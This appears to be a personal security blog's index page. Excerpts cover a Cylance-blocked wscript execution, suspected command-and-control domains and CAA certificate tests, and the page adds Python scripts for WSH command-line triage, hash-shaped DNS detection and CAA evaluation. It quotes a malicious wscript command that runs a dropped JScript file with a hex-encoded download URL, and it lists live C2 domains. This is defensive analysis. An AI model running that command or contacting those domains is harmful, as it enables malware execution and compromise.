Blog

About:me

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was

Continue reading “About:me”

Examining strange wscript behavior

We use Cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe "C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" "68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "–IsErIk"

I took a copy of the domo.txt script and uploaded it to VT. I also ran that hex string through a hex decoder:

68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net

According to

Continue reading “Examining strange wscript behavior”
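The triage the post walks through by hand (pull the command line apart, notice the engine override on a .txt file under ProgramData, hex-decode the odd argument) can be scripted so it runs over every blocked WSH command line the script-control console exports. The following is an added example, not code from the post or from Cylance. The suspect command line is the one quoted above with its backslashes restored; the benign line, the finding names and the thresholds are constructed assumptions.

```python
"""Triage Windows Script Host command lines for the signs seen in the post (added example)."""
import re
import string

ARG_RE = re.compile(r'"([^"]*)"|(\S+)')            # Windows-style split that honours double quotes
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){4,}$")   # even-length hex, at least 4 bytes
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}
WSH_HOSTS = {"wscript.exe", "cscript.exe", "wscript", "cscript"}
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}

# The command line from the post (backslashes restored); the trailing dash is kept as the post shows it.
SUSPECT = (
    'wscript.exe "C:\\ProgramData\\{18E0DD83-92A2-5745-1464-C9078E2642C9}\\domo.txt" '
    '"68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" '
    '"//B" "//E:jscript" "\u2013IsErIk"'
)
# Constructed benign line for contrast: a normal .vbs run with an ordinary argument.
BENIGN = 'cscript.exe //Nologo "C:\\Scripts\\inventory.vbs" 10.0.0.5'


def split_args(cmdline):
    """Split on whitespace, keeping quoted arguments intact (quotes stripped)."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def decode_hex_arg(arg):
    """Return the printable text behind an all-hex argument, or None if it is not one."""
    if not HEX_RE.match(arg):
        return None
    text = bytes.fromhex(arg).decode("latin-1")
    return text if all(ch in PRINTABLE for ch in text) else None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(cmdline):
    """Return (finding, detail) pairs for a WSH command line; empty list when nothing stands out."""
    args = split_args(cmdline)
    if not args or basename(args[0]) not in WSH_HOSTS:
        return []
    switches = [a for a in args[1:] if a.startswith("//")]      # wscript host options use //
    positional = [a for a in args[1:] if not a.startswith("//")]
    script = positional[0] if positional else ""
    ext = "." + basename(script).rsplit(".", 1)[-1] if "." in basename(script) else ""
    engine = next((s[4:] for s in switches if s.lower().startswith("//e:")), None)

    findings = []
    if engine and ext not in SCRIPT_EXTENSIONS:
        # //E: forces an engine, which is how a .txt file gets run as JScript
        findings.append(("engine_override", f"//E:{engine} forces an engine on {ext or 'no'} extension"))
    if "\\programdata\\" in script.lower():
        findings.append(("programdata_script", script))
    if any(s.lower() == "//b" for s in switches):
        findings.append(("batch_mode", "//B suppresses prompts and script error dialogs"))
    for arg in positional[1:]:
        decoded = decode_hex_arg(arg)
        if decoded and decoded.lower().startswith(("http://", "https://")):
            findings.append(("hex_encoded_url", decoded))
    return findings


if __name__ == "__main__":
    for line in (SUSPECT, BENIGN):
        print(line)
        for finding, detail in triage(line) or [("clean", "")]:
            print(f"  {finding}: {detail}")
```

Decoding is deliberately restricted to printable output so that a hex-looking but binary argument is not reported as text; the URL check is what turns the post's string into a pivot (the CloudFront hostname) rather than a curiosity.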

Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing:

dfbfb63dcaff96fbe9616fb806e4799f.com
8d46980d994cc618aeed127df1b5c86d8acd86ce.info
07bf396c25d9a624281c97752aee0247e4229b84.xyz
07bf396c25d9a624281c97752aee0247e4229b84.com
07bf396c25d9a624281c97752aee0247e4229b84.info
d234304f57772cf6be78ab6c24a65c91ce896fff.xyz
d234304f57772cf6be78ab6c24a65c91ce896fff.com
d234304f57772cf6be78ab6c24a65c91ce896fff.info
8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz
cbb0c7dae8061aca012b8a910062c33f3642e383.com
cbb0c7dae8061aca012b8a910062c33f3642e383.xyz
cbb0c7dae8061aca012b8a910062c33f3642e383.info

f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

I’m now the proud owner of these domains:

f5d599a39d02caef1984e95fdc606f838893ffc5.com
8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz
10bdc75ab2f0486f008dbdd8f1b0a38d7399598e.xyz

Why would I purchase such strange-looking domains, you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked, but as I

Continue reading “f5d599a39d02caef1984e95fdc606f838893ffc5.xyz”
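The domains in this post and in the update above share one visible trait: the registrable label is a bare hex digest of MD5 (32), SHA-1 (40) or SHA-256 (64) length. That shape is easy to hunt for in resolver logs before a reputation feed catches up. The following is an added example, not code from the post or from Umbrella; the domain names are the ones listed above, while the log format, the client addresses and the digest-length cut-offs are constructed assumptions. It generalizes slightly beyond the posts by also accepting the 64-character SHA-256 length.

```python
"""Flag DNS queries whose name carries a digest-shaped label (added example)."""
import re

DIGEST_LENGTHS = {32: "md5-length", 40: "sha1-length", 64: "sha256-length"}
HEX_LABEL = re.compile(r"^[0-9a-f]+$")
# Constructed log format: "<timestamp> <client> <qtype> <qname>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

# Constructed log lines; the queried names are the ones from the posts plus two benign controls.
SAMPLE_LOG = """\
2019-04-16T09:01:12Z 10.20.30.40 A f5d599a39d02caef1984e95fdc606f838893ffc5.xyz.
2019-04-16T09:01:13Z 10.20.30.40 A dfbfb63dcaff96fbe9616fb806e4799f.com.
2019-04-16T09:01:15Z 10.20.30.41 A www.example.com.
2019-04-16T09:01:16Z 10.20.30.42 A deadbeef.example.com.
2019-04-16T09:01:17Z 10.20.30.40 A cbb0c7dae8061aca012b8a910062c33f3642e383.info.
"""


def hash_shaped_label(qname):
    """Return (label, kind) if any label of qname is a full-length lowercase hex digest, else None."""
    for label in qname.lower().rstrip(".").split("."):
        kind = DIGEST_LENGTHS.get(len(label))
        if kind and HEX_LABEL.match(label):
            return label, kind
    return None


def scan_log(text):
    """Return [(client, qname, kind)] for every query whose name carries a digest-shaped label."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue          # constructed format only; skip anything else
        _ts, client, _qtype, qname = match.groups()
        found = hash_shaped_label(qname)
        if found:
            hits.append((client, qname.rstrip(".").lower(), found[1]))
    return hits


def clients_by_hit_count(hits):
    """Rank querying clients so the noisiest host surfaces first."""
    counts = {}
    for client, _qname, _kind in hits:
        counts[client] = counts.get(client, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, qname, kind in found:
        print(f"{client}  {qname}  ({kind})")
    print(clients_by_hit_count(found))
```

The full-length match matters: an eight-character hex label such as deadbeef is common in ordinary hostnames and is left alone. Even full-length digests show up legitimately in some CDN and object-storage hostnames, so this is a triage filter to feed an analyst or an allowlist, not a block rule on its own.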

CAA Test Results

As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities, and here’s what I found so far:

Amazon Certificate Manager (ACM)

It does not appear they honor the IODEF, since I didn’t receive an email.

Let’s Encrypt appears to also block issuance:

Let’s Encrypt (using lego)

2018/12/29 16:44:30 Could not obtain certificates

Continue reading “CAA Test Results”
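What a CA is supposed to do with those records is spelled out in RFC 8659: climb from the requested name toward the root until a non-empty CAA RRset is found, refuse on any critical tag it does not understand, then apply issuewild for wildcard requests and issue otherwise. Blocking is a MUST; sending a report to the iodef contact is only a MAY, which is consistent with a CA refusing issuance and never emailing. The following is an added example, not code from the post, from lego or from any CA: the zone data is constructed, the flag value 128 is the RFC's issuer-critical bit, and CNAME following and DNSSEC validation are left out.

```python
"""CAA evaluation as RFC 8659 describes it for a CA (added example, constructed zone)."""
from dataclasses import dataclass

CRITICAL = 128                                # issuer-critical flag bit
KNOWN_TAGS = {"issue", "issuewild", "iodef"}  # tags this hypothetical CA understands


@dataclass(frozen=True)
class CAA:
    flags: int
    tag: str
    value: str


# Constructed zone: owner name -> CAA RRset
ZONE = {
    "example.com": [
        CAA(0, "issue", "letsencrypt.org"),
        CAA(0, "iodef", "mailto:security@example.com"),
    ],
    "wild.example.com": [CAA(0, "issuewild", ";")],           # ';' = nobody may issue wildcards
    "locked.example.com": [CAA(CRITICAL, "futuretag", "x")],  # critical tag the CA does not know
}


def relevant_rrset(zone, fqdn):
    """Climb toward the root; the first non-empty CAA RRset is the relevant one."""
    labels = fqdn.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        name = ".".join(labels[i:])
        if zone.get(name):
            return name, list(zone[name])
    return None, []


def issuer_of(value):
    """'letsencrypt.org; validationmethods=dns-01' -> 'letsencrypt.org'; ';' -> ''."""
    return value.split(";", 1)[0].strip().lower()


def ca_may_issue(zone, name, ca_domain, known_tags=KNOWN_TAGS):
    """Decide whether ca_domain may issue for name; a leading '*.' requests a wildcard."""
    wildcard = name.startswith("*.")
    fqdn = name[2:] if wildcard else name
    owner, rrset = relevant_rrset(zone, fqdn)
    if not rrset:
        return True, "no CAA RRset found; issuance unrestricted"
    for rr in rrset:
        if rr.flags & CRITICAL and rr.tag.lower() not in known_tags:
            return False, f"critical tag {rr.tag!r} at {owner} not understood"
    tags = [rr.tag.lower() for rr in rrset]
    if wildcard and "issuewild" in tags:
        restricting = [rr for rr in rrset if rr.tag.lower() == "issuewild"]
    else:
        restricting = [rr for rr in rrset if rr.tag.lower() == "issue"]
    if not restricting:
        # e.g. only iodef present, or only issuewild on a non-wildcard request
        return True, f"CAA at {owner} has no restricting tag for this request"
    permitted = {issuer_of(rr.value) for rr in restricting}
    if ca_domain.lower() in permitted:
        return True, f"{ca_domain} listed in CAA at {owner}"
    return False, f"{ca_domain} not in {sorted(permitted)} at {owner}"


def iodef_contacts(zone, name):
    """Report targets from the relevant RRset; RFC 8659 only says a CA MAY use them."""
    fqdn = name[2:] if name.startswith("*.") else name
    _owner, rrset = relevant_rrset(zone, fqdn)
    return [rr.value for rr in rrset if rr.tag.lower() == "iodef"]


if __name__ == "__main__":
    for req, ca in [("www.example.com", "letsencrypt.org"), ("www.example.com", "amazon.com"),
                    ("*.wild.example.com", "letsencrypt.org"), ("host.wild.example.com", "letsencrypt.org"),
                    ("locked.example.com", "letsencrypt.org"), ("example.org", "anyone")]:
        ok, why = ca_may_issue(ZONE, req, ca)
        print(f"{req:24} {ca:16} {'ISSUE' if ok else 'REFUSE'}  {why}")
```

Two edges worth noticing when you author records: the climb stops at the first non-empty RRset, so a child name that carries only an issuewild record is not covered by the parent's issue record for ordinary certificates; and an iodef record on its own restricts nothing, it only names where a refusal might be reported.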
